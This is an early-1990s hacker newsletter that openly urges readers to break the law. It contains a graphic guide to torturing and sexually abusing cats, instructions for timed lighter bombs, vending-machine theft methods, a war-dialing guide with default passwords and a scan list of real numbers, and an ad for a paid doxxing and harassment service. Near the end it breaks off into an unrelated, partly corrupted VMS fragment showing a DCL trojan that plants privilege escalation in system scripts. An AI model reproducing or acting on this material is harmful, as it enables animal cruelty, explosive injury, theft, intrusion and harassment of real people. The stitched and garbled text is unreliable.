////// /////// //////// // // // // // /////// // //// // // // // // ////// // // ///////// International Rogues Guild and Shadow/Net Presents... IRG Newsletter v6.00 Released: 2/20/91 Written by: Haywire Edited by: Haywire Hi everyone, Heres IRG number 6 for ya, more people are getting interested and I am happy about it. Theres alot of good stuff this time(like always, hehe) so read up. 5.01 Table Of Contents ---------------------- 5.01...................................Table Of Contents 5.02...................................Disclaimer 5.03...................................More About IRG 5.04...................................CyberPunk Follies 5.04b..................................State Of The Union Reply by Psycho 5.05...................................Letters From Prison 5.06...................................Planned Parent Hood For Cats by Damaged 5.07...................................Disposible Lighter Bombs by Psycho 5.08...................................Vending Machine Revenge by Psycho 5.09...................................The Art of Scanning by Control-S 5.10...................................Hacking CompuServe by Control-S 5.11...................................Dos Trips by Wasteland Warrior 5.12...................................Running The ShadowNet 5.13...................................VMB's From Hell 5.14...................................Hellos and Goodbyes 5.02 Disclaimer --------------- All items in this newsletter are meant for informational purposes. It is written to encourage illegal activities, I hope the reader is inspired to break the law after reading all IRG Information. Of course the authors of this newsletter cannot be held for anything that the reader does. WARNING: Remember ALL explosives are dangerous, DO NOT, I repeat, DO NOT mess around with any of the recipes for explosives, EVER! These recipes are real, they can kill you, and anyone else. Make sure you know what you're doing. Otherwise its your fault. 5.03 More About IRG ------------------- We have one new ShadowNet member this issue and a new journalist. Hopefully you people are getting the idea and starting to write things for ANY group, just sharing the wealth of info out there. Until next time... IRG Members Rank ----------- ------ Haywire IRG and ShadowNet Leader Wasteland Warrior Part Time Programer,Game Winner,IRG Member Psycho (615)ShadowNet Member Dr. Digital (619)ShadowNet Member Damaged IRG's "Sick" Member Journalist ---------- Haywire The Spectral Demon Control-S Kryptic Night Psycho Damaged Wasteland Warrior Thats about it, if you feel like becoming a member of either IRG or ShadowNet. Please call one of the IRG nodes. If you would like to become and IRG node again contact one of the IRG nodes. 5.04 CyberPunk Follys --------------------- I have only gotten one reply to my "State Of The Union" speech, it seems that either people don't care what I say or they areto lazy to call up my board and give me a response. It seems that the Hacking community has turned to shit more then I had thought. But maybe people will get the idea one day and move on to a higher level. 5.04b State Of The Union Reply by Psycho ---------------------------------------- In response to Haywire's "State of Hacking Today" editorial in IRG #05, I would like to make the following comments: I agree with Haywire 100%- This shit over "Hacker Wars" has gotten WAY out of hand... What in the hell is wrong with people?!? Isn't hacking supposed to be a means by which we SHARE information and spread the wealth of knowledge? We hackers have before us an incredible realm of POWER- This has been exhibited time and time again; Everytime you hear of some kid who hacked into NASA or someplace and got caught, there are probably dozens more getting away with something just as spectacular. In short, we have the ability to manipulate and control the flow of ALL manner of electronic information. The authorities are starting to realize the actual scale to which systems can be hacked into, but it is far too late to do anything about it. For every hacker that gets busted, five more take his place- and it's a never-ending cycle. United and working together as one, hackers have the propensity to virtualy control (or shut-down) many facets of our society on a GLOBAL scale: banking, sattellite communications, military, law enforcement, etc., etc.... But instead of working together, the hacker community is splintered into many factions, all more or less working against each other. Instead of liberating information for all, we are instead battling it out in our own little area codes, searching for short-lived fame. I'm not saying that we should shut down all systems and holds the world's data for ransom; That would be futile. Instead, we need to help educate those with an interest in hacking but lack experience. Not that we should toss info out to anyone- There are still (and always will be) certain type of people that "just don't get it"... A little information and a lot of stupidity can be a dangerous thing with this type of "wanna-be". By a careful process of weeding out these types, the data will begin to flow into the hands of those that can best put it to use. So, in 1991, let's try to unify and SHARE our expertise- And I think you'll find that the hacking/phreaking community will benefit from this like never before. Hats off to Haywire and everyone else involved with the IRG for publishing this fine newsletter and making an effort for change. -Psycho 5.05 Letters From Prison ------------------------ I have been getting alot of stuff, this issue and I am very happy about it. The more the better, it always seems like I never have enough stuff. This issue is pretty long getting into alot of good stuff. This is a great issue check it out... 5.06 Planned ParentHood For Phelines by Damaged ----------------------------------------------- Phile #1 of a series Unknown @-@-@-@-@-@-@-@-@-@-@-@-@-@- - @ @ Planned ParentHood for - - @ @ Phelines - - @ @-@-@-@-@-@-@-@-@-@-@-@-@-@- WRiTTEN BY: Damaged 2.14.91 iNTRO Ok dudes this is my phirst seriers of Anrkey philes on Kat's. Don't you just hate those little pussy's, i sure in the hell do. Anyways, the phile is all How to do it yourself Home Kat abortions. Why the reason for kats, well i hate the goddamn shitheads for specific reasons. That i won't get into. Well enjoy the phile and have phun. SHiT YA'LL NEED Propane torch Koat Hanger Gloves Rope Nails Hammer Drugs & a Kat of kourse GET'N STARTED Ok, now get the above required stuff. Now toke a little, phry or whatever get's ya going. Phirst off take the koat hanger and bend it into a phairly straight wire. Take the koat hanger and make a noose on one end. You need to make sure that the noose is small enuf to phit into da Kat's Kunt. PHUN PART Ok now go out and phind yer victim. Well you have phound a kat, put on the gloves so you don't get scratch to hell and back. Now this is where the optional shit komes in. You kan either Nail the phucker to the ground by hammer'n nails thourgh it's pheet. This technique i phind to be the most effective. Or if your one of those squemish types (why the phuck are you read'n this then??) you kan use the rope. Just spread the phucker's legs to the phour korners. Tie the rope around each paw and tie to something else. Now you have the kat down supplied and bagged. Reach over and grab your nice instrument(koat hanger) and also grab the torch. Now you should be still wear'n the gloves, if not jack'n off will be a little harder phor you to do now. Anywayz, heat up the end of the noose with the oval end or however the phuck you made it. Wait until the shit is shine'n real bright orange or yellow. Some koat hangers will even turn white, now make sure you don't melt the damn noose. duh Insert the heated end of the noose into the kat's kunt, now jam the phucker all around, make sure you get every last one of those bastard kittens outta there. After you have phinished, unnail or untie the kat. Now i doubt it will walk away, but if you know who owns that kat, be a phriendly neighbor and drop it off at their house phor them. Now you really don't know which Kat is or not pregneat so hell try evey one of those pussy's. Now this also works for dogs, and even try this on yer girlphriend if you even knock her up. OTHER SiCK SHiT Now some other phun shit to do while do'n this. Bring along a tape recorder or a kamcorder and record the shit. Go home listen or watch it over and over again. Loads of phun dude. Now for you sick perverts, take a knife and just make the kat's kunt big enuf to slide yer dick in, hell a phree phuck. You kould also bang the phucker up the ass to if ya wanted. The best part about this is that it's like bust'n a virgin everytime and you don't have to wear a kondom either! Oh yea while ya do this phry really hard too. Yo'S & PHUCK oFF'S Yo's to LoL-PHUCK, THG for thier latest kracks, Sam Brown for all his nice back doors to Emulex, METALLiCA, Lutzifer, and all who think that they deserve some yo's (yea right) Phuck off's to PE Give it up, THG got yer ass Kicked, Acid Alliance, QSD lamers, Alto's you need to UPGRADE big phuck'n time, leeches, and all those K-Rad K0de KiDZ who do noth'n but phuck'n leech as hell and get Kaught too. KALL THESE KiCK'N SiSTEMS Insanity Lane..........619.591.4974 -=> IRG HQ <=- Zanaphopia.............404.642.8703 -=> AoA HQ <=- The Corrupt Society....619.630.8450 -=> NHA HQ <=- Demon's Crypt..........516.791.1427 -=> SoC HQ <=- Phreak Accident........404.977.4272 Latur dudes Damaged [--------------------------------- EOF ----------------------------------] 5.07 Disposable Lighter Bombs ----------------------------- ************** * * * Disposable * * Lighter * * Bombs * * * ************** by PSYCHO Written EXCLUSIVELY for The IRG For those of you who are budding anarchists or Mad Bombers, but don't feel comfortable cooking up nitroglycerine in your mom's kitchen or making pipe bombs in the garage, here's a fairly decent alternative that is safe, easily transported, cheap, and effective if used properly. All you need is a good supply of those shitty disposable lighters, like a Bic for instance. These can be bought cheaply (or stolen, if you're so inclined) at every damn convenience store between here and East Camelfuck, Iraq. Prices range from about 39 cents for averaged-sized lighters, up to about $1.79 for the extra-large ones, such as the Cli-Cla (my personal favorite- it is a HUGE disposable, holding about 65% more butane than the large Bic! They're available at fine truck stops everywhere...). Here is a chart to help you decide which lighter is best for your explosive needs: Lighter | Size of Explosion * ---------------------------|---------------------------------- Mini Bic | Small; 4 to 6 inch fireball | Scripto | Medium; 6 to 12 inch fireball | Regular Bic | Large; 12 to 18 inch fireball | Cli-Cla | HUGE; 24 to 30 inch fireball -------------------------------------------------------------- *(NOTE: These sizes are only an APPROXIMATION based on past observances- fireball size and intensity may be affected by such factors as atmospheric pressure, wind speed, humidity, manufacturing defects, etc. Your results will vary.) As you can see by the above chart, some of these lighters can be quite powerful. To give you a better frame of reference, consider the Mini Bic to be as powerful as an average firecracker, the regular Bic as powerful as an M-80 firecracker ( a REAL M-80... You can only get them illegally in this country- they are equal to 1/4 stick of dynamite), and the Cli-Cla as powerful as 1/3 to 1/2 stick of dynamite, under perfect conditions. PREPARATION AND METHODS OF DETONATION To prepare a lighter for use as an explosive device, the only real modification that must be made is the removal of the flame guard. The flame guard is the semi-elliptical piece of metal that is found on top of the lighter which encases the gas jet and flame adjustment mechanism (if present). This is easily removed by using a screwdriver (or even a finger) to pry away one edge of the flame guard, and thus popping the whole thing loose. With the above out of the way, you are ready for the placing of the device. Keep in mind that since the laws of physics declare that a force will always follow the path of least resistance, some forethought should go into the placement of the device for best results. If you just want a purely-for-the- hell-of-it explosion, the lighter can be placed on open ground, but for a specific purpose, such as the destruction of an object, opening of a door, etc., the lighter will need to be wedged as tightly as possible against the target. The only "timing device" you will have, such as it is, is the actual flow of gas from the lighter. Some lighters have no flame adjustment mechanism, and thus you have very little control over when the explosion will take place. On lighters where the control is present, you will be able to approximate the point at which detonation will occur. This is accomplished by turning the adjustment wheel toward the <+> or <->, with the <+> side naturally exploding faster. In some lighters, the maximum <+> setting can be over-ridden to allow the butane to escape very quickly, but keep in mind that the faster the gas escapes, the lower the power of the resulting explosion. You may find some experimentation necessary with different types of lighters you plan to use before you can become familiar with the approximate detonation times. Once you have decided on a target and length of time needed to escape and/or take cover, you are now ready to ignite the lighter. The most important element to keep in mind it that the gas release lever MUST remain depressed for the duration of time until the explosion occurs. There are many methods for assuring this, as pointed out below: A. Wedge the lever in the open position by placing an object between it and the striking wheel. B. Glue the lever down with a glob of Crazy Glue. C. Tape the lever down with aluminum strapping tape (regular tape will not work due to rapid melting). D. Wire the lever down with a few inches of light-gauge copper wire. These methods are not the only absolute choices you have, but I have always had good luck with them. Once the lever has been secured, you need to act as quickly as possible, to ensure as little butane as possible is wasted. Using another lighter, ignite the stream of gas escaping from the one you want to explode. Another factor you might want to consider for timing is the physical direction of the tank of the lighter in relation to the flame- If the flame is above the tank (as in normal operation), it will take much longer for the heat to melt the plastic and cause the detonation than it would if the tank was placed at a 45-or-so degree angle with the flame being BELOW the tank. Here is a chart of approximate times based on positioning of lighter and gas flow: Gas | Lighter Upright | Lighter Inclined Flow | (flame above tank) | (flame below tank) ================================================== MIN. | 5-10 minutes | 3-5 minutes --------|---------------------|------------------- MED. | 3-5 minutes | 1-3 minutes --------|---------------------|------------------- MAX. | 1-3 minutes | 60 seconds or LESS Again, these figures are APPROXIMATE- Times will vary according to many factors including, material used in manufacture, quality of butane, etc. Using the above chart as a guide, plus some experimentation on your own, you should be able to discern timing factors relating to your individual needs in certain situations. Of course, lighting the butane and allowing it to melt the plastic tank casing is not the only method for detonating disposable lighters- other possibilities include: * Affixing a large firecracker or other small explosive device to the tank * Placing the lighter in an open flame (campfire, fireplace, etc.) * Placing the lighter on, in, or near a heat source (engine block, tail pipe, oven, space heater, etc) As you can see, however and wherever you choose to use a lighter as an explosive, it is a cheap and (usually) ample solution. Always use great care and common sense when handling ANY explosive device, and have your escape route or cover picked out well in advance. Also be aware that, due to the materials used in it's construction, an exploding lighter will hurl bits of metal and molten/flaming plastic, sometimes for several yards in all directions. HAPPY BOMBING! Thanks to: Haywire & The MIGHTY IRG! Special Thanks to: The Phantom Fireman for his pyromania expertise. 5.08 Vending Machine Revenge ---------------------------- VENDING MACHINE REVENGE by Psycho Written for the IRG How many of you have ever been ripped off by a vending machine? I would guess that EVERYBODY, at one time or another (and probably MANY times), has met up with a "change eater". This can be frustrating as hell, especially if you're hungry or thirsty and the machine took all the change you had. Worst of all, many times the owner of the machine takes his sweet time getting it fixed- After all, any money you lose is pure profit for him. The following is a collection of various techniques that have been used with great success to extract revenge on these money-grubbing bastards, and can put a few bucks in your pocket as well. I guess some unscrupulous person COULD use this information just to rip off other hapless consumers, but that is their discretion (ha ha!). 1.0 SLUGGING This is one of the most common forms of Vending Machine Revenge (from herein referred to as VMR), and also one of the safest. Basically this involves putting something into the machine that is not a coin, but the machine will think it is. Experimentation of a high degree will be in order here, as all machines have different levels of sensitivity. Some of the more common items used include: metal washers, arcade tokens, foreign coins, plastic discs, etc. I think you get the idea. I have even heard of people using a bench grinder to file pennies down to dime size, but that seems like an awful lot of work for 9 cents, but how you want to spend your time is up to you. Again, you'll have to experiment a lot with this one. If anyone finds some that work particularly well, leave me a message on the IRG/Insanity Lane node, and I'll draw up a chart for a future issue. 2.0 TIPPING Another quite popular method, this is accomplished by physically tipping the machine forward as far as you can get it, hence the name. This works best on those machines that have potato chips and stuff dangling from long metal rods, and also those that use spiral rods to hold the stuff. If you want to use this method of VMR to the fullest, it's best to take along a couple of stout friends. Reason being, you will get the best results by practically putting the front of the machine down to the floor, and some of these bastards can be REAL heavy. So, DON'T try this one alone (unless you look like Arnold Schwarzeneggar), and make sure you do it quietly and in an out of the way area to avoid getting caught. 3.0 ROCKING The Rocking method for VMR is similar to the above, but is seems to work best on coke machines which dispense cans. To get free cokes, you rock the machine back and forth, really banging the hell out of it. This confuses the machine's coin mechanisms, and it will usually start spitting out cokes. This VMR method will also require the assistance of friends, for obvious reasons (coke machines are the heaviest of all vending machines). This one must also be executed in a very deserted place, due to the excessive noise level created. You'll also want to remember to take along some backpacks, pillowcases, etc., to put your free cokes in. I have seen machines completely emptied using this method. 4.0 PLUGGING So far, we've only discussed methods with which you can obtain free snacks- Now, here's one that can net you some good pocket change. Unfortunately, this will only work as described on newer coke machines. Perhaps with experimentation, it can be adapted for use on other machines. Plugging is accomplished by doing just that- you use something which will get hung in the coin slot, such as a penny, slug, etc., but will still fall through when the coin return is pressed. On newer coke machines, the coin return is a long piece of horizontal metal that presses straight down. After inserting your plug, use a flat-blade screwdriver to bend the coin return bar so that it cannot be depressed. Now, take the rest of the day off and do whatever. When you return later that night, use your screwdriver to bend the return lever in the other direction. When you press it down- JACKPOT! You get all the coins that other people have "lost" that day. Rotate among different machines, and don't plug the same one more than once a week to obtain best results. By doing this to enough machines in various locations, it's possible to make around $100 PER DAY (the average take for one machine is usually around $5). Another good place to do this occasionally is coke machines in expensive hotels, since they usually inflate the price of their drinks by 50% over normal machines. Be extremely careful and don't get TOO greedy, and this method is very safe. 5.0 JAMMING-1 This type of VMR is one of the best for getting lots of free stuff. What you do is actually jam the "product chute" (where the goods come out). Any manner of things can be used to do this. For instance, open the little door on a coke machine where the cans come out. Now, take a stick, huge wad of paper, etc., and cram it as far up into the machine as you can comfortably reach. This will block the arrival of anyone's purchase, and you only have to pull out whatever you blocked it with on your return to retrieve the stuff. On cigarette machines, you can even put tape over the side slot where the smokes are dispensed to accomplish this. As in some of the above methods, experimentation will be in order here to learn about the machines in your area. This is a fairly safe method of VMR. 6.0 JAMMING-2 This is the same as the above method, but instead you jam the change return slot. It's not as profitable as screwing up the coin return, but hey- it's FREE money. You may have to use a small wire to accomplish this on machines that have a small door that opens inward on the change slot. Again, if done smartly and not too often to the same machine, this VMR method is safe. 7.0 ZAPPING Personally, I have never been able to get this one to work, but I know people that swear by it and say they use it all the time. Also known as "shorting", this type of VMR involves locating the socket where the machine is plugged in, and rapidly working the plug back and forth, causing the electronics in the machine to screw up. I'm told it only works on machines that have an LED display showing the amount you've dropped in. One person claims to have "maxed-out" the display at $9.99 and got that much OUT of the machine when he hit the coin return! Like I said, I've never been able to do this, but there are lots of people who claim it can be done. Experiment and find out for yourself, and drop me a line if you get it to work. 8.0 KILLING This isn't as drastic as it sounds- It actually means that you unplug the machine, thus "killing" the power to it. Some machines, when unplugged, will simply NOT return any coins. And, you'd be surprised at how many people will go ahead and stick money in a machine, even if it's not lit up... And most people won't look for the plug to check it, either. This is a very safe, quiet method that has been proven to work on certain machine. As before, experiment with machines in your local area. Well, that should be enough ideas to get you started- I'm sure there are many, many more. If you have a particular favorite, leave me e-mail on Insanity Lane and I'll include them in any future updates of this article. In the meantime, just remember not to get too greedy, and you can have a tidy little income from your VMR exploits. Thanks go to: Haywire & the IRG for publishing the newsletter and allowing me to write this article. Special thanks to: The Bubblegum Bandit, H.R. Puffenstuf, & Headhunter for their input in compiling this article. 5.09 The Art Of Scanning by Control-S ------------------------------------- +++++++++++++++++++++++++++++++ ++ ++ ++ The Art Of ++ ++ *->> Scanning <<-* ++ ++ ++ ++ By: Control-S ++ ++ ++ +++++++++++++++++++++++++++++++ This file is written for International Rogues Guild (IRG), and is the second in a series of files aimed towards the begining hacker. If you've been around a while, you will most likely find nothing of use here. Part 1: Scanning, the art of Part 2: Scan-Pages v1.00 Disclaimer: This phile is for informational purposes only, and I cannot be held responsible for the actions of anyone reading it. WARNING: If the words "k-kewl", "d00d", or "k-elyte" are a part of your every day vocabulary, stop reading now, you are to far gone for help. Scanning: Scanning is one of the most legal aspects of hacking, and a lot of fun too. I'm not saying that scanning IS legal, I really doubt you could get anyone to answer that question. If the SS wants to bust you, they will do it for scanning, or anything else they feel like, if theres no law against it, they will make one up! You can't win, so I would just recommend that you watch your step no matter what you do. You can scan many diferent places, like x25 networks such as TymNet and Tele(Sprint)Net or simply telephone exchanges, which is what I'll be going into here: Scanning your local exchanges, I basically view this as 'getting to know your neighborhood' - its good to get an idea of how many modems are in yer area, and just what sort of 'puters are connected to them. You'll more than likely come across a few Unixes, and some VMS', if you're lucky, you'll find a LAN or WAN, and be able to reach a bunch of different systems from one number, some of these even connect to far systems, some with outdials (which you can scan other areas through), or gateways (where you can hook into even more systems and/or psn's). Things You Need: *Personal Computer - (almost any type) (Amiga recommended) *Modem - (any baud) (at least 2400 recommended) *A Wardialer or Scanning program - These are available for just about every type of computer, but if you can't find one, they are easy to write yourself, in either basic or even scripting. (I would highly recommend you write your own, its a good way to get started programming and you can customize it to do exactly what you want it to.) *References - You should have on hand (or commited to memory) some text files or manuals that will help you identify the systems you find, and then give you and idea of how to get in and possibly use them. (You can find detailed 'how to' files on just about any operating system you might find in many Phrack newsletters, if you don't have them all, get them!) - (See appendix A of this file for simple system identification). *A little common sense - sorry, you're on your own with this one. Getting Started: Using that little bit of common sense, you should fire up your computer and modem. (If you can't get by this part, you should stop reading this file immediately, run down to your nearest computer store, and trade your PC in for a nintendo!) For best results, you will want to do some sort of sequential scan, this way you won't miss any carriers. If you are paranoid about leaving a sequential patern, (the SS looks for this sometimes, trying to catch 'c0dez kidz') then you will have to make some part of the dialing random. Making the whole scan random has a few problems; if you wan't to make sure you get all of the numbers, and don't keep going over the same ones, you have to keep track of all the numbers dialed and check it every time before dialing. This is a big waste of time, the best way to do a sequential scan without a patern, is to use a node dialer. Node dialers are common in code hacking programs, and these are easilly modified to just scan. The ideal configuration for a node dialer (the one I use) would be to use 10 nodes, each scanning 1000 numbers in the same exchange, then just randomize which node is dialed. Example: Node 1 Dials 0000->0999 Node 2 Dials 1000->1999 Node 3 Dials 2000->2999 Node 4 Dials 3000->3999 Node 5 Dials 4000->4999 Node 6 Dials 5000->5999 Node 7 Dials 6000->6999 Node 8 Dials 7000->7999 Node 9 Dials 8000->8999 Node10 Dials 9000->9999 ATDT + This method is just as fast as dialing them straight out, you don't miss any numbers, re-dial any numbers, and you aren't using any detectable dialing pattern (other than possibly 300 calls per hour). Now that you've got your dialer configured, you need to find a good time to scan. Again, if you're paranoid, you should stick to scanning between 9AM and 5PM. This is for two reasons; 1) This is the when most buisness calls are made, and in the huge volume, you will be that much harder to detect. 2) If you DO get busted (can you imagine going to court for such a thing? hah!) you will have a good case, as many people dial sequential numbers durring this time, (re: telemarketers, surveys...). This is also probably the time when you'll be at work/school/whatever, so you won't be needing your CPU. (I personally scan while I'm asleep, at night - I'm not that paranoid!) As a rule of thumb, don't watch the dialer. For some reason, no carriers are detected while you watch the scan in process. (I've heard rumors that this is the result of a minor disturbance in the local space-time-continuum caused by invisible emissions from the iris, but have seen no proof to back this theory.) Okay, now you have your dialer ready and a good time to scan. Fire it up and check on the progress every few hours. After you scan out a fair sized list of carrier signals, you should give the dialer a rest, boot your favorite term program, and investigate all your finds. Don't expect to see something like this: "Welcome SysOp!" on the systems you check, in fact, expect nothing. Many systems don't wave any banners or tell you anything, you have to try and coax a responce out of them. Things to try would be: 's, Ctrl-C, or any other Ctrl-'s, (if you send a Ctrl-S, be sure to send a Ctrl-Q after it, because many systems use this as a 'halt-output' switch, and you may discover the right keys to press, but never know it because all output is stopped. Try sending "..." or @'s, [Esc], and sending a hard break almost always gets some responce, if none of the above work, try any character on the keyboard, and words like "boot, start, run, load, logon, login". If you have an external modem, keep an eye on the "Recieve Data" light, if it flickers and you aren't getting anything echoed to your screen, or possibly a lot of garbage characters, switch to 7E1, or call back at a lower baud rate. (I've found a bunch of systems with modems that will connect you at 2400, but the com ports will only transfer data at 1200 or 300) If you try everything and can't get any responce at all, it could be a company which turns its computers off at night, but leaves the modem on (so call back in the day), a crashed system, or a hacker who got your scan-call at 3am and wistled an unerring 8N1 into his reciever at a steady speed of 2400 bits per second. -heh When(if) you identify the operating system, break out your references, and try all the default accounts. If you get in on a default, but you're unfamiliar with the particular OS, don't mess around, just log off and do a little research, learn how to turn off all the logging and cover your tracks, then go back and have phun to your hearts content. Remember: keep notes on all the systems you find. You never know when some ancient OS might come in handy, or what you might find that relates to any system while trashing at a later date! Apendix A: The following is a short chart to help you identify operating systems. System Prompt Default Accounts/Passwords --------- -------------------- ------------------------------------- Unix login: -or- Login: root,daemon,bin,sync,uucp/(unpassworded) VAX Username: SYSTEM/MANAGER -or- FIELD/SERVICE DEC-10 User ID: 1,2/ ? HP-?000 PLEASE LOG IN: HELLO,MANAGER, Iris ACCOUNT ID? MANAGER VM/CMS IBM VM/370 ONLINE logon (user id) NOS FAMILY: Primos "PRIMENET XX.X.XXX" login SYSTEM/SYSTEM -or- OPERATOR * This hardly all-inclusive, only the ones I know from memory, you should try and compile your own list, and add new systems to it regularly. This has been a phree Speech publication, (C) pSp and IRG 1991 As usual, I can be contacted for whatever on any of the IRG nodes, or IRG e-mailing addresses. Please mark all comments "Attn: Ctrl-S". Control-S, Freelance G-File Artist (for hire) Scan-Pages v.99b: Note: Unfortunately, I will be unable to finish my current scan in time for the next IRG release, so I stuck this partial scan in to fill the spot. Look for a complete scan in v1.00, next IRG. NPA/NUM-BER Baud System/Comments ------------ ----- -------------------------------- 619/259-0038 n/a ?/constant tone 619/270-0017 1200 ?/has echo on 619/270-0038 2400 ?/"Unauthorized User, Call Recorded and Disconnected" 619/753-0006 n/a ?/constant tone (may be loop) 619/753-0013 n/a ?/constant tone 619/753-0171 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0172 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0173 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0174 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0175 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0176 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0243 2400 ?/(sending a hard break makes hangup) 619/753-0287 1200 TRW Dialup 619/753-0288 1200 TRW Dialup 619/753-0548 1200 ?/"D29 System C, Node XX, Line XX" 619/753-0716 1200 ?/"ALPHA BASE, PLEASE LOG IN:" 619/753-0738 1200 ?/(just hangs up, maybe callback security?) 619/753-0911 1200 ?/(response to break ^Z) 619/753-0916 1200 ?/(response to break ^Z) 619/753-0933 1200 ?/(response to break ^Z) 619/753-0962 1200 ?/(response to break ^Z) 619/753-0981 2400 HP-?0000/PLEASE LOG IN: (try 'help') 619/753-1550 2400 PC-Plus Host Mode/ American Bamboo Society 619/753-2614 1200 ?/(absolutely no activity - a modem with no 'puter?) 619/753-2728 2400 "Host Name:" (^C will get "User ID:") (CIS, node ENC) 619/753-1654 2400 ?/Esc will get "ACCOUNT-ID: / PASSWORD:" 619/753-1079 1200 ?/"D29, System C, Node XX, Line XX" This is hardly a complete list, its more or less the result of boredom, and fairly random scanning through an outdial, it does cover about 1/3 of the 619-753 exchanange, but I never finished because of lack of time and other projects taking precedence. I would like to try and organize a concerted effort to map out any/all NPA's, and eventually publish a masterlist of all detectable carrier signals. Its easy to do, and you can usually let yer computer scan while yer gone to school/work, so if you'd be interested in helping out, leave me a note on one of the IRG boards and tell me the NPA and excknes you'd be `BLe to scan, via local call or some sort of outdial, so we can make sure that different people aren't wasting time scanning the same exchanges! Anyone who helps to build the list will g1 at Glasgow End of file - Frm 9; Next> 6.BBSs From Hell ---------------- Here is this issue's installment of BBSs From Hell. Board Name Phone Number NUP SysOp ------------------------------------------------------------------------------- Shadow's Of Doom 313/274-5630 ? ? Fornax 408/370-0722 ? Briareos The Rocky Mountains 714/530-6258 ? ? The CorrupT SocieTy 619/630-8450 Defiance The Spectral Demon Land Of Karrus 215/948-2132 Nightmare Scooter Next issue we will have five more Elite BBSes for you to try. Sorry if I have placed your bbs number on here without your knowing, if you would like it removed from the master list please E-mail me at Insanity Lane 619-591-4974 NUP: Last Try. 7.VMBs From Hell ---------------- Heres a little plus I decided to have in each IRG news, a VMB list it will work like the BBS list in that I will have 5 VMBs each issue and every so often I will have a master list printed. All changes to VMBs will be posted in each IRG News. VMB Number Box Number VMB Use ------------------------------------------------------------------------------- 1-800-877-7594 Code Line 1-800-848-1488 * 0 Code Line / Info Line 1-800-741-5881 9 + * * 1111 Code Line / Info Line 1-800-950-0203 289 Time Lord's Code Line/ Info Line 1-800-950-0203 617 Code Line / Info Line Well thats it for this installment of VMBs From Hell. If you would like you VMB in IRG News please leave mail at IRG/ShadowNet VMB #1 1-800-527-0543 Box Number: 8 + 158. 8.Running The ShadowNet ----------------------- ShadowNet is the newest addition to IRG. It is a information service for anyone willing to pay. ShadowNet works the way a Private Investigator works...you pay us to find out information on people, except we will do much more than that. We will go one step farther than any PI would go. We will change his phone #, send him 100 pizzas, or ruin his credit rate. Of course the more you pay the better you get. At the beginning we will work for free to show that we can do what you ask. So get your orders in fast. All we need is a name, phone number, handle, whatever. The more information you start giving us the more you will get back. I also am in need of "agents" or people to help work with me. I hope to get at least one person in each area code so information can be found easier and faster. Of course you are not restricted to the computer oriented community. We can and WILL find information on ANYONE. We'll also work for anyone who is willing to pay. So let's hear from you, either on my BBS/VMB. Give me your voice phone number, and your name. I will contact you for who you want ShadowNet to find out about. If you would like to join leave the same info but tell me that you want to join. Simple enough. Until Next time. 9.Hellos and Goodbyes --------------------- So you are now done reading IRG-03, I hope you enjoyed yourself. I am sure the more IRG Newsletters me and The Spectral Demon put out the better they will get, if possible. TSD and I have worked hard on this newsletter and now its your turn. Hurry & get those letters in for the next IRG News. Now for the hellos & goodbyes, greets and etc! FiRM what ever happened to you? INC ditto! Kryptic Night do you do Magic Mushrooms? PHA whats next for you? * Greets to Elite Tabloid Underground What ever happened to the Elite community? Strike Back! Remember: Big Brother Is Watching Freedom Of Speech! * - Entries marked with *'s are by The Spectral Demon only ------------------------------------------------------------------------------- This Is An Offical IRG/ShadowNet Production All Rights Resevered Copy Write (C) Jan. 1 1991 ------------------------------------------------------------------------------- Call The IRG HeadQuarters: Insanity Lane Home Of IRG 619-591-4974 NuP: Last Try Running Aftershock 1.21 Call here for the latest in IRG Productions, and invaluable P/H/C/A information found nowhere else, except at: The CorrupT SocieTy IRG Node 02 619-630-8450 NuP: Defiance Running AfterShock 1.21 Also Call This Fine IRG/ShadowNet VMB #1 1-800-527-0543 Box Number: 8 + 158 First of course you MUST check for the privileges of the user (just like in the above program), then try: $open/write file sys$scratch:adduaf.tmp $write file "$ RUN SYS$SYSTEM:AUTHORIZE" $write file "MODIFY NAME/PRIV=SETPRV" $close file $@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat $del sys$scratch:adduaf.*;* This little patch in the coding will modify your own users privileges and give them SETPRV when the superuser executes this routine. The trick is to hide it within some other program so he doesn't even realize he has done anything! Of course after the routine has been successfully executed, the original coding should be put back. There are many places you can put this routine, including ADDUSER.COM (if you have write access)! That would mean, every time the system manager went to add a new user, he would also boost your privs! HaHa, quite ironic eh?! The farthest thing that he wants to do, and you make him do it without even realizing. Of course you should use your imagination and put this or a similar routine in a place where it will be quickly executed. The longer the code stays around without being execute, the more chance that it will be discovered. An optimum program would be something that the users/operators execute frequently (eg notes, mail, phone etc) Other good places are the LOGIN.COM and SYLOGIN.COM files. Just remember to cover your tracks once you're done!! This is but a brief introduction to Trojans and the like. You should use your own imagination to come up with other ways of making the system operators succumb to your wishes...heh heh. DCL PROGRAMMING --------------- No file would be complete without at least mentioning programming Command Procedures. Basically, these are like BAT files from MS-DOS or script files from UNIX. They form a rudimentary but powerful language that allows you to quickly create small programs to handle most simple tasks. This section is not intended to be a a full blown tutorial on programming in DCL, rather its an introduction to what it is all about. It is quite easy to pick up programming in DCL and the best way to learn is to have a look at some of the COM files you will find on the various VAXes that you hack on. By studying these, you can quickly learn the methods on how to perform certain routines. Below I have listed some of the commonly needed routines when programming in DCL: PASSING PARAMETERS Parameters can be passed to DCL programs directly from the shell in several ways. Here are a few examples: (1) @sample 24 25 When you execute this, the values 24 and 25 are passed to the sample.com file in the variables p1 and p2 respectively. ie p1=24, p2=25 (2) @sample Paul Cramer p1=PAUL, p2=CRAMER (3) @sample "Paul Cramer" p1=Paul, p2=Cramer (4) name= "Paul Cramer" @sample 'name' This example demonstrates the m K of passing predefined variables to a command procedure. In this case, p1=PAUL, p2=CRAMER (5) name ="""Paul Cramer""" @sample 'name' Note that passing the variable in three double-quotes preserves the case. p1=Paul, p2=Cramer GETTING INPUT Often it is necessary to get some sort of input from the user when executing a command procedure. This is performed through the INQUIRE command. Some examples follow: (1) INQUIRE variable "prompt" This will display the 'prompt' message and then wait for input. The string passed is kept in 'variable' (2) INQUIRE/NOPUNC variable "prompt" When you specify /NOPUNC, the prompt will NOT be followed by a colon and space as is the default. (3) INQUIRE/LOCAL variable "prompt" INQUIRE/GLOBAL variable "prompt" It should be noted that if you specify /LOCAL, the variable will remain in the 